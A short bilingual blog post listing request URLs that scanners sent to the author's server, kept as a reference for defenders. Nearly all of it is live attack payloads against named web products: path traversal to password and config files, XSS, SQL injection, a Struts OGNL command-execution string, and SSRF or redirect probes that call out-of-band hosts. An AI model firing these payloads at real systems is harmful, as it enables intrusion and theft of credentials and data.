记录服务器被扫描_01

前言

如果你通过关键词搜到了这篇文章，不要特别惊慌，大概率它还没找到你项目的漏洞。

I login my server occasionally and I found my server is scanned by multiple different ip client.

这些扫描真的太讨厌了。

I publish part of it here for my later reference and also hope that it helps others.

一部分 url

/include/thumb.php?dir=http\..\admin\login\login_check.php
/authenticationserverservlet
/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/s=set&_method=__construct&method=*&filter[]=system
/bsh.servlet.BshServlet
/install/
/jshERP-boot/user/getAllList;.ico
/e/ViewImg/index.html?url=javascript:alert(1)
/web/xml/webuser-auth.xml
/WEB_VMS/LEVEL15/
/api/dp/rptsvcsyncpoint?ccid=1
/webadm/?q=moni_detail.do&action=gragh
/tool/log/c.php?strip_slashes=printf&host=nl+c.php
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/get_dkey.php?user=admin
/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
/index.php?s=/home/page/uploadImg
/login.do?message=927289*877080
/seeyon/htmlofficeservlet
/api/v1/GetSrc
/common/download/resource?resource=/profile/../../../../etc/passwd
/login/login.do?message=927289*877080
/seeyon/test123456.jsp?pwd=asasd3344&2Y9kA8xB7oFTfW0jiGEsucaj9Ma=ipconfig
/api/v1/GetDevice
/sys/ui/extend/varkind/custom.jsp
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/servlet/~ic/bsh.servlet.BshServlet
/servlet/~ic/bsh.servlet.BshServlet
/sys/ui/extend/varkind/custom.jsp
/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
/public/index.php/home/file/user_pics
/users/sign_in
/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
/zentao/user-login.html
/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet
/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=ypogp.txt
/mobile/plugin/browser.jsp
/_vti_inf.html
/level/16/exec/show/config/CR
/cgi-bin/rpc
/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/names.nsf/People?OpenView
/index.php?redirect=http%3A%2F%2Fwww.interact.sh
/uapjs/jsinvoke/?action=invoke
/2Y9k9jsxz6n7zfc3JwkoH364vK9.jsp
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId
/images/logo/logo-eoffice.php
/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh
/search.htm?searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e
/login.action
/src/redirect.php?plugins[]=../../../../etc/passwd%00
/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/index.php?sl=../../../../../../../etc/passwd%00
/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U
/horde/admin/user.php
/admin/user.php
/exchweb/bin/redir.asp?URL=https://interact.sh
/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0
/comm.php?id=../../../../../../../../../../etc/passwd
/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/cs.html?url=http://www.interact.sh
/api.php?action=logout&forward=http://interact.sh
/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22
/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/adm/file.cgi?next_file=%2fetc%2fpasswd
/scripts/setup.php
/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
/adm/krgourl.php?DOCUMENT_ROOT=http://cl9hkovpu5aci1q5grr0tksaficbu6qnm.oast.pro
/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search
/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search
/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/awstats/awredir.pl?url=interact.sh
/cgi-bin/awstats/awredir.pl?url=interact.sh
/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
/axis2-admin/login
/axis2/axis2-admin/login
/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/status?full=true
/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/red2301.html?RedirectUrl=http://interact.sh
/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/lui/
/hub/
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
/pandora_console/ajax.php?page=../../../../../../etc/passwd
/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/cgi-bin/mj_wwwusr?passw&list=GLOBAL&user&func=help&extra=/../../../../../../../../etc/passwd
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00
/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/advanced-text-widget/readme.txt
/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f
/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/portal/displayAPSForm.action?debug=command&expression=5345*7520
/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?r=i/../../../../../etc/passwd
/document.php?modulepart=project&file=../../../../../../../etc/passwd
/index.php?class=../../../../../../../etc/passwd%00
/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/reports/rwservlet/showenv
/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E
/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E
/assets/login?a=https://interact.sh
/tiki-featured_link.php?type=f&url=https://interact.sh
/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E
/user.action
/index.action?redirect:http://www.interact.sh/
/wp-content/plugins/age-verification/age-verification.php
/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E
/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/photoalbum/index.php?urlancien&url=../../../../../../../../../../../../etc/passwd%00
/webadm/?q=moni_detail.do&action=gragh
/web_shell_cmd.gch
/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/telaen/redir.php?https://interact.sh
/redir.php?https://interact.sh
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter
/_search?pretty
/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e
/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E+
/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php
/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/webEdition/showTempFile.php?file=../../../../etc/passwd
/wp-content/plugins//wp-planet/readme.txt
/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
/process/feries.php?fichier=../../../../../../../etc/passwd
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/go.php?http://interact.sh
/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/webadmin/auth/verification.php
/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/
/webadmin/clientlogin/?srid&action=showdeny&url
/wlsecurity.html
/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/remote/login?err=--%3E%3Cscript%3Ealert('2Y9k9brmDWvf7aNHmtYKEkVDZeN')%3C/script%3E%3C!--&lang=en
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json
/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/2Y9kA6run5mzP2VCACTil5CyYtk
/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/website/blog/
/_search
/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content&wp-attachment-export-download=true
/inc/supportLoad.asp?urlToLoad=http://oast.me
/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me
/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
/_fragment?_path=_controller=phpcredits&flag=-1
/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd
/openwin.php?redirurl=http://interact.sh
/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/novius-os/admin/nos/login?redirect=http://interact.sh
/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh
/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/wp-login.php
/wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini
/login
